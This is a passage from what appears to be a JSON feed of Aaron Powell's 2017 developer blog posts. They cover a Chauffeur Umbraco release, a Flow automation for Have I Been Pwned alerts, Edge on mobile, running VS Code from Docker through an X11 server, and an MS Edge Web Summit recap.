first abstract and nervous presenting my first talk, but I’d do it all again.\n", "id": "2017-10-31-hit-refresh" }, { "title": "Chauffeur v0.12.0", "url": "https://www.aaron-powell.com/posts/2017-10-26-chauffeur-v012/", "date": "Thu, 26 Oct 2017 14:54:45 +1100", "tags": [ "umbraco", "chauffeur" ], "description": "What's new in the latest Chauffeur release?", "content": "Chauffeur, my little Umbraco deployment tool is chugging along quite nicely. I don’t do a huge amount of work on it, mostly it comes in batches when I get requests from people who are using it. For the release I’ve just cut, v0.12.0, I’ve got quite a lot of changes in it so I wanted to do a bit more of a write up about them.\nSide note: I cut v0.12.1 almost straight away because I realised the NuGet logo was broken 😛.\nThe Chauffeur Scaffolder I believe this is the killer new feature of Chauffeur!\nOne of the hardest parts of using deployment tools is how to incorporate them into your existing project, and Chauffeur is no exception. Whether your project is something you’ve worked on for hours or worked on for months, the “Getting Started” is always a pain.\nWhile on the train home last night I pondered this. I started by thinking “What does a Getting Started guide look like?” and I mapped out the steps:\nInstall the NuGet packages Create your first delivery file Add the setup steps Export your Umbraco structure to a package, which means you have to create a package Create a delivery step to import that Well that requires a bunch of manual steps, and the “create package -> setup” step is one that’s really annoying to do (speaking from experience here!) so I started to think on how I could automate that. I’d been toying with the idea of a create-package Deliverable for a while now and this seemed like a logical intersection, I have some of the insights on that, why don’t I plug it in there.\nSo I quickly whipped up a GitHub issue and got cracking on the code. My ideal workflow is that you could do:\nInstall NuGet package chauffeur scaffold Profit The new scaffolder will ask 3 questions, the name for the initial delivery, whether you want the install steps (install y and user change-password) and if you want a package generated of your site structure items (DocTypes, DataTypes, etc. excluding content).\nOnce done it’ll run and you’re ready to check everything and start collaborating!\nDocument Type Improvements One of our clients here at Readify is using it on a new project and I was talking to the team on how they are using it and any pointy edges. Their biggest issue turned out to be something that I didn’t even realise was a bug and that is when you import a Content Type (aka Document Type) with a property change it doesn’t get reflected. I found it odd that no one had told me this previously so I did some investigation and found that there’s a problem that I logged on GitHub to track.\nThe crux, it turns out, is that the Umbraco import engine is designed to be a lot more non-destructive than I realised, and it doesn’t update properties, only adds new ones!\nWell good news, in Chauffeur v0.12 this is fixed, I’ve created a bit of an extension over the importer to ensure that we handle that properly inside Chauffeur (and I created a regression test to cover it).\nDelete operations From here I started exploring more of the possible problems that could come up and one that I knew of but never had thought to deal with was removing of Content Types. Now there’s nothing in the Umbraco package engine (which I mostly rely on) that does this, after all, how do you import a delete? so I decided that the easiest way would be to extend the existing content-type deliverable with a remove feature command. Now you can do:\n1 umbraco> content-type remove <alias> Another piece of feedback the team gave me was they’d like a way to remove a property, so I have added that too:\n1 umbraco> content-type remove-property <alias> <property alias> Delivery comments This is a small task that’s just been hanging out in my backlog, I wanted to have a way that you could add comments to a delivery file. A line comment is denoted by ## so you can do something like this:\n1 2 3 4 ## Create the Umbraco database install y ## Set the admin password to something super secret user change-password admin passwordpassword Again, it’s the small things that are nice.\nOutput formatting Another thing that’s always annoyed me is how sloppy the output looked when you used content-type get-all (or get <alias>), and this was because, well, output formatting isn’t that easy when you’re using Console.Out. But I decided it was time to get it cleaned up and make a pretty table that has everything lined up. With this change we go from this:\nId Alias Name Parent Id 1067 demo Demo -1 Property Types Id Name Alias Mandatory Property Editor Alias 73 someProperty Some Property False Umbraco.TextboxMultiple To this:\nId | Alias | Name | Parent Id 1067 | demo | Demo | -1 Property Types Id | Name | Alias | Mandatory | Property Editor Alias 73 | Some Property | someProperty | No | Umbraco.TextboxMultiple That looks much better.\nLogo! I’m starting to think about going “v1” with Chauffeur, it’s only been about 3 years since I cut the first lines of code for it, so it’s probably time. So that means I want to put a bit more polish on things and one of the things in doing that is I wanted a logo.\nWell, I found one, I’ve grabbed an image from The Noun Project which is available from Ed Piel and used under Creative Commons from The Noun Project.\nSo everyone, install Chauffeur v0.12 and get deploying!\n", "id": "2017-10-26-chauffeur-v012" }, { "title": "Using Flow to monitor Have I Been Pwned", "url": "https://www.aaron-powell.com/posts/2017-10-09-flow-hibp-todo/", "date": "Mon, 09 Oct 2017 18:30:44 +1100", "tags": [ "flow", "automation" ], "description": "How I'm using Microsoft Flow with HIBP to notify me of breaches", "content": "I, like many people, use Troy Hunt’s Have I Been Pwned to notify me when my account was in a data breach.\nWhile the email notification is fine it doesn’t really fit into my workflow and honestly I get that much email it’s just another thing that is picked up by Clutter and filtered out of my inbox. Because of this it’s often days before I even find out I was in a breach, not really ideal.\nBecause of the amount of email that flows through my inbox I’m constantly trying to work out what’s the best way for me to bubble up the actions I need to take and then track them, as opposed to the stuff that I’ll read eventually (ok, never). I’ve played around with a couple of different ways to do this and at the moment I’m giving Microsoft Todo a crack. In Todo I have all the opportunities I’m tracking as part of my Technical Pre-Sales role as well as a bunch of personal things I need to follow up on. So this sounds like an ideal place to put my “change password cuz you were in a breach” task.\nEnter Microsoft Flow When I want to do simple automation I crack out Microsoft Flow which is a great tool to monitor a bunch of different kinds of inputs and then perform actions when triggered. So I set about a plan to combine Flow and HIBP, I wanted to:\nHave a new breach trigger a Flow If i’m in the breach pop an item in my todo list ??? Profit Creating our Flow Right, so the first thing I need to do is be notified of a breach. Now you could do this with an Email connector in Flow and look for incoming emails from HIBP but that’s a bit risky, do you fuzzy match the subject? look for a from address? hope that it’s landing in your inbox (which mine doesn’t)?\nOr do you go simple and subscribe to the RSS feed?\nI’ve chosen to go for an RSS approach in Flow, it’s really simple and does exactly what I want. Only down side, it’ll trigger on every breach, not just when I’m in it.\nAm I pwned? So we’re being notified of a breach, now to work out if I was in said breach. Again Troy has made this pretty easy for me because he has an API for HIBP that is not only free, but really simple to use.\nI’m going to need to make 2 API calls, first one is to the the breach details, which I’ll need to get the domain so I can pass it across to the breaches for account API call (I have the Parse JSON Flow step between these so I can get the values out of the response). This will return a 200 OK if I was there or a 404 Not Found.\nRaising a Notification With that the basic structure of our Flow is done, we’re about to perform some kind of notification when you were in a breach, you could do a Push notification or send an email (😛), or as I want to do, push something across to Microsoft Todo!\nGetting Started with Outlook Tasks Unfortunately, at the time of writing, Microsoft Todo doesn’t have a Connector in Flow, so instead you’ve got to this all yourself. Thankfully there’s a detailed API for Microsoft Todo, which just happens to be Outlook Tasks under the hood.\nThe simplest approach to this is to just HTTP Action and you’re set to go… almost. There is one tricky thing to deal with still, authentication. You see, you need to provide an Authorization header to the Outlook API so you can work with it… kind of makes sense.\nAgain the simplest approach would be to use something like Postman to generate you a token, but that token will only last for a short period of time, so chances are you’ll need to generate a new one each breach.\nInstead I’ve created a custom Connector in which I can define my Authentication type (OAuth2.0 in this case) and set the appropriate details for your Office Application, and then you’re good to define the Flow Actions against the Office Tasks API. I’ve created one that wraps around the Create Task API, defined some default parameter values on the body (because don’t want to type the date time local each time) and now you’re good to go!\nBringing it all together Here’s how the flow looks:\nThe values I’ve set for the Todo item that’s created are:\nSubject of Update password for <domain> Start Date of <added date> Due date of <added date + 1 day> And there we have it, you’re good to go!\nConclusion Well it was really simple for us to introduce a Flow that will track breaches in HIBP and if you’re in it perform some kind of action, in my case create a task in Outlook Tasks using a custom Flow Connector.\nIf you’re interested to have a play with it I’ve exported the Connector:\nAnd the Flow itself (although you’ll need to re-map the Connector once uploaded), make sure you set your email address in the step where we call HIBP’s API:\nHappy automating.\n", "id": "2017-10-09-flow-hibp-todo" }, { "title": "Edge On iOS And Android", "url": "https://www.aaron-powell.com/posts/2017-10-06-edge-on-ios-and-android/", "date": "Thu, 05 Oct 2017 20:14:02 +1100", "tags": [ "ms-edge" ], "description": "Microsoft Edge on iOS and Android, what does it mean?", "content": "If you missed the tech news this morning Microsoft announced that the Edge browser is coming to iOS and Android. This, on the surface, seems like quite an unexpected move but digging deeper it isn’t that unexpected.\nSo with it announced I want to talk about about what it is, why I’ll be installing it for a play but don’t know if I’d move to it as my primary browser on my Pixel.\nEdge but not Edge As an MVP something that I’ve been asked more times than I can remember is “When is Edge coming to …” and my answer to this is always “don’t bank on it”. Does that mean that I’m now eating my words?\nNo.\nWhen you think about a browser there are really three core pieces that come together to make it work, the browser UI, the JavaScript engine and the Layout engine. In Edge this is a UWP (that as best as I know doesn’t have a name of its own), Chakra (extensions on top of ChakraCore) and EdgeHTML (a slimmed down version of Trident).\nAnother thing that you need to understand is the restrictions on the mobile platforms, particularly iOS. With iOS you’re unable to have a default browser other than Safari, nor can you run an application that does its own JIT. If you look at Chrome or Firefox for iOS they both sit on top of the WebView, rather than using Blink or Gecko as the rendering engine.\nAndroid is less restrictive, you can run your own layout engine, which Firefox for Android does. Edge though relies on the Chrome engine, similar to how the Samsung browser works.\nSo where does this leave Edge, if it’s not using the same layout engine or JavaScript engine? The UI and associated systems.\nNot so unexpected If you’ve been following what Microsoft has been doing over the last few years you’ll have seen their push into a platform agnostic software provider, with Office across iOS and Android, Cortana appearing on mobile and partnering with Amazon on Alexa, .NET going cross platform and so on.\nSo an integrated Edge experience, syncing your browsing across multiple platforms (like Chrome or Firefox, and to a lesser extend Safari) makes sense, it’s all about data. You see by tracking what you’re doing on the web across all your devices, not just one, companies can produce a more complete profile of you as a web users and that feeds into… well I try not to think about what they know about me and can do with that into 😛!\nThe browsing experience What does this all mean as an user browsing the web? Well it means that the version of Edge you’re using on iOS or Android you’ll have a different layout engine to the desktop version. This means that you might have different features, making UA sniffing even less viable and it’s yet another justification for feature detection.\nConclusion Unsurprisingly there’s been a bunch of internet trolling out on this already, “why don’t you just use Blink on desktop” (which I’ve blogged about before), “fix/add/remove feature X” (maybe vote for it), etc. but it’s pretty par for the course these days.\nEdge of iOS and Android it’s meant to be for everyone, it’s targeted at people who are already using Edge as their primary browser and want to have their favorites, reading list, passwords, etc. roaming across multiple devices.\n", "id": "2017-10-06-edge-on-ios-and-android" }, { "title": "What's New On The Web Platform", "url": "https://www.aaron-powell.com/posts/2017-10-02-whats-new-on-the-web-platform/", "date": "Mon, 02 Oct 2017 14:18:29 +1100", "tags": [ "web", "speaking" ], "description": "Some new features in the web platform from the MS Edge Web Summit", "content": "I recently blogged about my experience at MS Edge Web Summit. On the back of this I was invited to speak at ALT.NET Sydney to share some of the things I’d learnt about. I covered off three topics, the Payment Request API, Sonar and some new features in F12.\nFor the Payment Request API I created some demos:\nA basic demo A demo using multiple payment methods Requesting shipping address Dynamic shipping options “Lazy loading” shipping options Note: These demos are purely client side and don’t submit card details or anything, you can see the code for each page by following the commit link in their footers.\nIf you want to learn what the Payment Request API is about check out this article.\nI also cover off Sonar, which is a linting tool that’s great for ensuring you’re website is running as best as it can be (yep, I haven’t got it integrated into my blog yet, one day 😛).\nThe final topic was what’s new in F12 for Edge 16, but I was really pressed for time by then, so you’ll get more out of Jacob Rossi’s MS Edge Web Summit talk.\nIf you want to watch my talk it’s up on YouTube.\n", "id": "2017-10-02-what's-new-on-the-web-platform" }, { "title": "Docker, FROM scratch", "url": "https://www.aaron-powell.com/posts/2017-10-01-docker-from-scratch/", "date": "Sun, 01 Oct 2017 18:38:36 +1000", "tags": [ "docker", "conference", "ndc", "speaking" ], "description": "Learning Docker by starting at the basics and working our way up", "content": "A perk of working at Readify is that we strive to be leaders in technology so we’re always encouraged to learn new things. One such thing that I started getting into a year or so ago was Docker. Now I’m not an infrastructure person, I left that part of IT a long time ago, so what I was interested in Docker for was how it can be used in a development experience and how it fits there before even beginning to look at running a containerised production environment.\nSo as a consultant (well, former consultant) I would often spend time coaching people around what Docker is and where to get started and what I realised was that too often those of us who’ve been working on a technology for a while forget that there’s a lot of people who haven’t started that journey yet. There’s a long way from running Kubenetes clusters in production when you’ve not yet created your first container.\nDocker, FROM scratch At NDC Sydney this year I presented a new talk I’ve been working on in this space called Docker, FROM scratch. You can watch the talk here:\nIn this talk I walk through a getting started guide to Docker, we start at the basic “Hello World” style example of running an Ubuntu container and dropping into a shell, then we go all the way through to running a multi-container architecture with multiple networks. I do this by walking through a git repository which you can find here (and there is a walk through of each step too).\nI quite enjoy giving this talk so I hope you find this a useful introduction to Docker so you can get started on your journey.\n", "id": "2017-10-01-docker-from-scratch" }, { "title": "Readify PC 12 Months On", "url": "https://www.aaron-powell.com/posts/2017-09-27-readify-pc-12-months-on/", "date": "Wed, 27 Sep 2017 10:11:55 -0700", "tags": [ "readify", "career" ], "description": "A look back at the last 12 months of being a Readify PC", "content": "Around 12 months ago I wrote a blog post about my journey from SD to PC at Readify and I thought it might be worthwhile doing a follow up to that about how the 12 months since then have gone. If you haven’t read the first one you might want to read it, it’ll give a bunch of context into what I’m talking about here.\nWhat’s Changed? As much as I’d like to say that moving into the PC role I was able to answer every question, solve every problem, etc. but unsurprisingly no, that wasn’t the case. Realistically nothing really changed, at least not immediately, as I was really doing most of the PC roles during the ~6 months prior. I also happened to be in the middle of quite a large project so that was the main focus.\nBut as that project got into a more solid place my involvement was less required and I was able to move into more non-billable work. What do I mean by that? as a PC you will spend a portion of your week not directly on a client but instead focusing on a number of other Readify activities, from doing health checks with other teams, helping fellow consultants on their career path, or pre-sales activities.\nGrowing into the PC role Being in the new role I was able to spend more time doing some stuff that I found I was really enjoying, and one such thing was pre-sales, going out to qualify an opportunity. This kind of work allows me to spread my technology breadth wider, look at more kinds of problems and how to solve them, as well as doing more technical writing.\nI also got an opportunity to get involved in a digital transformation project for a large multinational project. This was a really great opportunity where I was put in the position to do the Enterprise Architecture, setup a technical architecture, work with a team distributed across 4 cities and 3 countries and start planning out a roadmap for how we’ll evolve from what was mostly a PoC to being a platform supporting dozens of delivery teams. Admittedly there were weeks where I’d spend every day in meeting rooms which is tough, but I learnt a heck of a lot on that project and about how to run projects at scale.\nThe End of an Era In September I hit 7 years at Readify, and it’s also when I hung up my PC boots at Readify. After 12 months I realised that while there were parts of the role I enjoyed there were also parts I didn’t enjoy, or at least, I didn’t find myself being the best fit for at this point in my life.\nSo instead I’ve taken a transfer within Readify to a new role as a Technical Pre-Sales Consultant, so I’m now part of the sales team!\nWhat I realised when I moved into the PC role was that the stuff that I enjoyed the most of was understanding the why of a project, working with clients to define a project, how it’d work and importantly, just what the underlying business motives are.\nNow onwards and upwards into the world of sales!\n", "id": "2017-09-27-readify-pc-12-months-on" }, { "title": "VS Code, Linux, Docker for Windows", "url": "https://www.aaron-powell.com/posts/2017-09-21-vscode-linux-docker-windows/", "date": "Thu, 21 Sep 2017 13:41:09 +1000", "tags": [ "linux", "docker" ], "description": "", "content": "I’m currently writing a blog post on VS Code for Linux, running inside a Linux docker container, hosted by Docker for Windows (on my Windows 10 machine), with the UI being piped across to Windows using a X11 server.\nWhy? Because why not!\nWhat the hell is this all about? Back when I was first getting into computers I was a Linux kid, I ran a Linux server at home to do local DHCP/squid proxy/etc. and I ran Linux on my laptop (a lovely 486 laptop with an external network card) which was always fun to get drivers for. I was compiling my own kernel, experimenting with every different distro that I could get my hands on and living mostly on the terminal.\nAs I moved to becoming a web developer I found myself developing on ASP.NET 1.1 (well, started with ASP, then moving to .NET 😛) so my Linux machines would get less and less love, eventually finding themselves relegated to the back of the closet.\nSo what’s this trip down memory lane got to do with anything? Well unless you’ve been living under a rock you’ll be aware of Docker which makes it really easy to run containerised Linux applications on Windows (and Windows containers, but that’s not relevant for this post).\nI’m a big fan of Docker, I find it really useful not just for working out how to deploy something through to production, but also for running applications you don’t want to install, I use if when I come across single-use applications like 7zip (because someone once sent me a .7z file)!\nAnd also if you know me you’ll know that I quite like to do things that people would think are, well, dumb. And when talking to some people when I have done Docker training they’ve asked about GUI applications. Now naturally I said this was probably not possible as you can only really drop internal a terminal session.\nWell I was then talking to another friend of mine, Jason Stangroome, who does a lot of work in Docker pointed out that it’s totally possible. This is when I got a TIL on how GUI’s work for applications using X11. It turns out that X11 actually works across network protocols to draw the display. Now in hindsight this actually makes a lot of sense because if you’ve ever worked with a remote Linux (or Unix) server you can connect to GUI applications it runs, I remember doing that with PuTTY back in the day.\nThis then got my brain turning, if you could work out how put something with a GUI into a container and launch it, it’s just a matter of starting an X11 server that it connects to. Like any good idea it turns out that others have already done it, and Jason pointed to me to the works of Jessie Frazelle. Jessie wrote a blog about how she runs applications in containers, including applications with GUI’s.\nFrom this I decided it was time to work out how to make this work on Windows.\nRunning Linux GUIs on Windows from Docker The first thing you need to do is go out and find yourself a X server for Windows. Now it seems there’s a number of different options available, unfortunately it seems that a little more unpleasant than you’d like because all the OSS servers I found are hosted on SourceForge and, well, I refuse to trust anything that comes from there! So instead I went with the free version of MobaXterm and doesn’t even require an install.\nNow you’re ready to go, fire up MobaXterm and configure its X server, I left it running on the defaults using ‘Multiwindow Mode’ so each application that I run through it can be managed independently.\nThe only thing left for me to do is to actually run something against it. I headed over to Jessie’s Dockerfiles on GitHub to find something to play with. To ensure my craziness was properly justified I thought I’d grab VS Code, and it’s also quite a basic container to run.\nAnd running it was simple:\nPS> docker run --rm -e DISPLAY=192.168.2.13:0.0 -v "$(Get-Location):/code" jess/vscode I ran this from my PowerShell terminal and the above is what you saw! The only thing I changed from the example is that I don’t mount /tmp/.X11-unix as a volume (I don’t have that on Windows), the DISPLAY environment variable doesn’t require the unix prefix and I don’t include --display /dev/dir (mainly because I don’t know what it does 😛).\nSo there you go, we are now running a GUI application from a Docker container running on Docker for Windows launched from PowerShell, mounting a folder from your Windows OS.\nSure the font doesn’t look quite right, it’s somewhat laggy when your typing (making writing a blog a bit odd) and I don’t have my VS Code settings, but I’ve got it containerised damnit!\nRunning Linux GUIs on Windows from Docker in WSL Sofar I’ve managed to get everything running through a number of layers, but there’s one more layer I wanted to add, Windows Subsystem for Linux, aka WSL. This is a native Linux implementation running on Windows allowing you to run Linux binaries. My first step was to install Docker in WSL, which is just a matter of following the standard install instructions. But one thing you can’t do is run Docker containers on WSL, but that’s not a problem, the Docker client just points at a running daemon somewhere, so we can point the Linux client to the daemon running in Windows (you have to disable TLS over TCP too, not sure why, you just do)!\nSo we can now run this:\n$ docker -H localhost:2375 run --rm -e DISPLAY=192.168.2.13:0.0 -v pwd:/code jess/vscode And there you have it, you’re using a Linux docker binary to connect to Docker running on Windows to run a Linux container on a VM in Hyper-V, to connect to an X Server running on Windows to run a text editor writing in JavaScript.\nBecause why the hell not!\n", "id": "2017-09-21-vscode-linux-docker-windows" }, { "title": "MS Edge Web Summit 2017", "url": "https://www.aaron-powell.com/posts/2017-09-15-msedge-summit-2017/", "date": "Fri, 15 Sep 2017 16:08:37 -0700", "tags": [ "ms-edge", "mvp", "conference" ], "description": "My takeaways from the MS Edge Web Summit", "content": "I’m currently sitting in SeaTac airport SEA ✈ LAX LAX airport LAX ✈ SYD, preparing to fly back to Sydney after a whirlwind trip (I landed on Tuesday afternoon, it’s currently Friday afternoon and I’m flying back 😛) over to attend the MS Edge Web Summit.\nI was invited due to my contributions as a Microsoft MVP, an award that I’ve been proud to hold for 7 years now.\nWhen I arrived in Seattle I met up with fellow MVP’s, Chris Love, Jonathan Creamer, David Wesst, Ryan Hayes and Jared Faris, then we headed to the Seattle Web Performance meetup, which was their relaunch event. It was great to meet some other people in the web community, even if us out-of-towners did out number them and we couldn’t contribute much to how the meetup should be run 😛.\nDay 1The next day was where the fun started, we rolled on up to the summit location and got ready for a day of learning.\nKeynote The event kicked off with Charles Morris keynoting the event. There was a celebration of the 2nd birthday of MS Edge, and a bit of a look at how that has gone. They had two members of the “Shell team” (the UI of MS Edge) talk about how they gather feedback to prioritise what to work on next, which includes browser/OS telemetry, internal Microsoft feedback, external feedback through the Windows Insiders program and twitter itself (they showed off two specific UI issues that have seen a lot of twitter noise, editing favorites and the address bar moving on focus). I really enjoy these kinds of insights, as someone who is vocal about what I do/don’t like, being able to understand how my feedback is consumed by the team helps humanise the process, you’re not just shouting into a void, people are listening.\nThe second half of the keynote was then focused on EdgeHTML, the rendering engine of Edge. There was talk about the evolution of Edge 12 - 16 (with 16 coming out in the Fall Creators Update in October, or available now on Insiders if you’re running it like me) and I also learnt that the easiest way to see what’s new in a release is https://aka.ms/devguide_edgehtml_16 and you just change the number on the end to the version you want. Charles also covered off the other resources that there are for MS Edge, like the status site, dev resources, etc. There was also talk about what’s the focus of EdgeHTML going forward and that’s broken up in 4 categories, improving the fundamentals (performance, accessibility, reliability, etc.), Progressive Web Apps (PWAs), Dev Tools (aka F12) and interop/new standards. I’m super excited about PWAs, but I’ll talk about that a bit later on.\nThe final part of the keynote was touching on the interop story, Apple still holds a massive share in the web developer market and *nix environments is where a lot of tools are still born. So Windows Subsystem for Linux (WSL) was introduced and as was the new partnership that the Edge team is embarking on with BrowserStack. Through this partnership Microsoft is making Edge free for both Live and Automated testing on BrowserStack, while also working with them to have the versions of Stable, Stable - 2 and vNext. This combined with the VM’s available for free make it really hard to argue that if you’re not running Windows 10 it’s too hard to test on Edge.\nBuilding a safer browser The second session for the day was on what the Edge team is doing to make the browser more secure, by Nathan Starr and was a dive into the low-level Windows “stuff” that is done to help secure the web. As a web developer this is not something that I ever really think about, when I think about web security I think about things like HTTPS, not putting credentials in cookies, appropriately storing passwords in a database, etc. and I’ve never really thought about things like how the browser blocks malicious actors from injecting code, rewriting memory, spawning new processes and things like that. If you want to get an appreciation for what sounds like a really hard thing to do (honestly, I didn’t understand much of what was talked about!) check it out.\nPWAs and ServiceWorkers After a break and some hallway tracks it was the topic that I think most people where there to see, Progressive Web Apps and Service Workers. This is one of the most exciting features coming to the web in recent years (I talked about it in my NDC Sydney recap) and Edge 16 ships with a fairly complete implementation behind a flag (they want feedback from users on it before considering it stable) and with WebKit recently starting development all four major browsers are now invested.\nThe Service Workers talk was a bit of a ‘hello world’ talk, which I’ve seen before, but what I did learn from it was that F12 already has support for Service Workers, this I didn’t know, I was relying on the Chrome dev tools! Ali also talked a bit about IndexedDB and the change in the storage limits to be pretty much unlimited, which excites me as someone who’s a know IndexedDB fan. After the session I managed to get a hallway conversation going with Ali about the missing pieces of IndexedDB in Edge. Basically it’s down to a capacity issue, his team run both Service Workers and IndexedDB, and Service Workers are the higher priority, which I guess we can live with, let’s get that shipped!\nJavaScript and TypeScript Then it was time for Brian Terlson to talk about ChakraCore and TypeScript, which was a bit about the journey of ChakraCore into being an Open Source project and why they went about doing it (mostly they couldn’t find a reason not to). He then talked about some of the performance optimisations with ChakraCore, such as the work they’ve done around minified code which, contrary to popular belief, is generally byte-for-byte slower than un-minified code. This probably comes as a shock to most web developers, but part of it is logically, minified code has more code per byte so it’ll be slower, but moreover some of the tricks to compress code as small as possible don’t result in high performance operations, such as exploiting type coercion for false with !!0 or the comma operator. Through telemetry and analysing websites they can detect these patterns and optimise for them. But there’s other optimisations that Brian talks about like deferring code parsing and others.\nThe TypeScript portion of the talk was encouraging people who either hadn’t looked at TypeScript, or had dismissed it in the past, to give it another look. He started with a simple JavaScript file that he added // @ts-check to the top of, which the TypeScript compiler (via VS Code as an editor) knows to try and do some level of type validation of the file. This picked upa couple of simple errors and used the JSDoc comments to do some basic type support. He then renamed it to a .ts file, removed the comment and showed how that improved detection for a few other edge cases that you might’ve missed. He also showed off the extract function feature that’s coming in the next compiler release, which is really cool and I can’t wait for!\nSonar, the web’s linter [sonar]](https://sonarwhal.com) is something that Microsoft released earlier this year as an Open Source project under the JS Foundation (formerly the jQuery foundation) which I remember seeing announced earlier this year but I didn’t get what it was so I filed it under ‘future reading’ (which we all totally get to right 😉).\nWell Antón Molleda was here to tell us all about sonar and it’s kind of the next evolution of the web compatibility tool that Microsoft released around the IE10 days that you could paste in a URL and it’d tell you a bunch of things wrong with your site.\nThe way it works is that it’s a node tool that you install globally or locally, and then run it against pages within your website (it doesn’t seem to do crawling at this point in time) and then it “lints” your page using defined rules against your browser set. The linting covers a number of different rules from whether you return too small an error page response (which has issues in IE and old Chrome), do you have the right Apple icons, what’s your accessibility like or do you use any libraries with JavaScript vulnerabilities. Like a standard linter you can enable/disable rules as you need but the team has taken it a step further and made it easier to disable sets of rules based on the types of browsers you’re targeting. Say you’re building a purely mobile website, well it doesn’t make sense you want to support any version of IE, as there’s no mobile device that runs that (and is supported), so you would add a browserList property to your sonar config file and say "browserList": "not ie", then bam, all rules that are specific to only IE are excluded!\nAntón also showed the online version they are working on and had only got working the night before! The online one aims to help you track your linting over time.\nI’m going to look at how to get it integrated into my website, but there’s a slight issue in how my 404’s work that crashed sonar (but they fixed it already for me!) and well, I got around 84 issues the that rule disabled 😟.\nCSS Grids My CSS skills are decent but are starting to become a bit dated, I know all about box model hacks from IE 6 but the newer stuff that’s come in I simply haven’t got around to learning. CSS Grids is one such thing that I see a lot of excitement on twitter but have never looked at myself. Melanie Richards, who I saw as an awesome person for the Edge team to have got, gave us an overview of CSS Grids in Edge 16. If you’re doing any sort of UI work but haven’t looked at CSS Grids yet, do yourself a favour and watch this talk. All of us MVP’s came away from that session going “wow, CSS Grids are so cool!” and that was partly how cool they are but also just how simply and elegantly Melanie explained them.\nShe also talked about the differences from the -ms-grid CSS properties that Edge has, which is actually the precursor to CSS Grids and how to do feature detection using @supports.\nMaking ecom better If you’ve been following Edge development one of the big features they’ve been toting that they included in Edge 15 was the Web Payments API. Molly Dalton delivered a session on Web Payments that took a look back at how we do ecom and that that basically hasn’t changed since it was first done in the ‘90’s. She then showed how it works, some of the features around complex check outs and then had a representative from Shopify come up to demo how they are integrating it into their platform.\nAnyone who’s working at a company that does ecom needs to be looking at Web Payments, it’s a great step forward in how we do payments online that exists in Edge, Chrome 61+, Chrome for Android 53+ and flagged in Firefox. Apple has their own thing in ApplePay but they are involved with the standards body who’s working on Web Payments so hopefully we’ll see a convergence in the future.\nF12Ahhh F12, the tools you love to hate. Jacob Rossi gave a bit of a history lesson on F12 in his session about the future of F12 in which he talked about how they really haven’t been touched since Edge first came to be.\nThat’s about to change. I’m a big fan of Jacob’s work, I’ve been following him as he has moved around the Web Platform team and I’m really excited to see him at the helm of F12. With Edge 16 we’ll see a few new features, like a new console that supports things like console.table, collapsing repeated messages together and styling output, some tweaks in the DOM inspector and how DOM breakpoints work, and also some really cool accessibility tools.\nBut the real meat of this talk is what’s coming next. Over the next while the team is going to be rebuilding the tools. One of the things that Jacob talks about is introducing a JSON based API that the tools can use to talk to the browser, rather than being baked in like they are. This is somewhat similar to how Chrome’s dev tools work, but they want to take some of the learnings from Chrome and improve on it. Why not just implement the same as Chrome? Well you’ve got to remember that the internals of Edge are quite different to Chrome (and Firefox, and WebKit), so having a one-size-fits-all approach would mean that you’d have to compromise a lot. I really like this API approach to dev tools as it means that it in theory will be easier for 3rd parties to build their own tools as well, kind of like the Chrome debugger in VS Code. Naturally all of this will take quite some time to achieve so we’ll just have to wait and see how it all plays out, and of course give feedback along the way.\nOh and they are finally added an IndexedDB explorer to F12, one feature I’ve been bugging them about since the IE10 days 😛.\nHow do they prioritise features? My personal favorite talk of the day was Greg Whitworth’s talk on how they plan Edge. Greg talked through some of the stuff in the keynote, but in a lot more depth. I think that we as web developers really don’t take into consideration just how complex building a browser is, I know I don’t really appreciate how complex it is. There’s so many different sources of data to consume that feed into decisions, so many moving parts to align, etc.. One thing that I found quite interesting was how he talked about UserVoice feedback. In Edge 16 many of the top voted UserVoice features are being shipped, but there’s a bunch of other really top features that aren’t being shipped, take Shadow DOM for example. What Greg talks about is how they look at votes-over-time as well as the raw vote count. A feature (and I’m not saying that Shadow DOM is an example of this) might have a massive spike in votes, go up really high, but then drop off in people pushing for it. Where another feature might not be the #1 voted feature but it constantly gets votes. This can indicate that one feature has a wide reaching consistent pain point, where as the other might’ve been a tweetstorm driven upvote.\nIf you’ve only got time to watch a single session from Edge Summit I’d say watch this one.\nVR, AR, MR We had two people from the WebVR team on Edge, Nell Waliczek and Lewis Weaver talk about the new Windows Mixed Reality devices that are coming and to use them in WebVR. As a web developer WebVR is something that I’m struggling to get excited about. Don’t get me wrong, I think that VR (AR and MR) are really amazing pieces of technology, they’ll really change the way we interact with computers, but it’s just not my thing.\nDon’t get me wrong, the session wasn’t a bad session, it did a good job of covering off how to get started with WebVR, talked about some of the popular libraries that you can use to get started and I got to play with one of the headsets during the mixer, but I’ll leave the development of WebVR to others and just be a consumer 😉.\nHallway track I’ll admit that I didn’t catch the last few sessions of the day on performance and accessibility, instead I went to have some conversations with some of the Edge team who were around in the breakout area. Anyone who’s been to a conference will be aware that these kinds of conversations are just as useful and insightful as any session you might get to. I got to chat to Jacob a bit more about the planned changes around F12, chat to the people behind sonar and play with the MR headsets with some WebVR demos.\nDay 2The second day (yeah I didn’t fly to the states for just a single day, I did spent 2 days there!) myself, the other MVPs and the other invited experts were bused over to Microsoft’s campus to spend a day with the team. Unfortunately I can’t divulge what went down in much detail, it was an NDA event, but there’s a few things I can share.\nWSL We had Rich Turner from the Windows Console team talk about WSL, what their goals are and some of the inner workings of it. The way WSL works is really quite fascinating, the Windows team had to implement the Linux syscalls from scratch by observing how Linux works, they couldn’t just copy Linux’s source, or even look at it, that would result in a violation of the license. That’s crazy!\nI then proceeded to grill Rich and some of his colleagues from the Windows Container/Docker for Windows team who were there around Docker, its relationship to WSL, or at least how to use it effectively from WSL. I’ve got a few things I want to experiment with that would make for a good blog post on their own.\nRich’s a really interesting guy with a great set of stories about working on the kernel and he was really happy to tell me that I’m mad when I was telling my stories about how I would prefer something to be in a Docker container than actually installed. I call nerd credit when one of the top people on the Console team tells you you’re mad!\nEdge, OSS and the future A lot of the day was more spent hanging out with groups from the team in round table discussions. While I can’t go into any specifics of what was discussed some of the key takeaways are that accessibility is a really high priority of the Edge team, performance and stability will keep a lot of people busy and if we thought the shift towards being more open (communication, releasing tools as OSS, etc.) had peaked, well it’s only getting started. If you want to help shape how the web platform works there’s no better time than the present to active.\nConclusionI want to say a big thanks to Kyle Pflug who was one of the key organisers, and responsible for getting myself and the other MVPs there. Also a big thanks to all the Edge team who were around, I got to meet a number of people who I respect in the community and have chatted to on Twitter such as Sean Larkin, Rachel Nabors, Chris Heilmann, Antón Molleda, Patrick Kettner and many others. And on that, the number of the Edge team you can now find on Twitter is 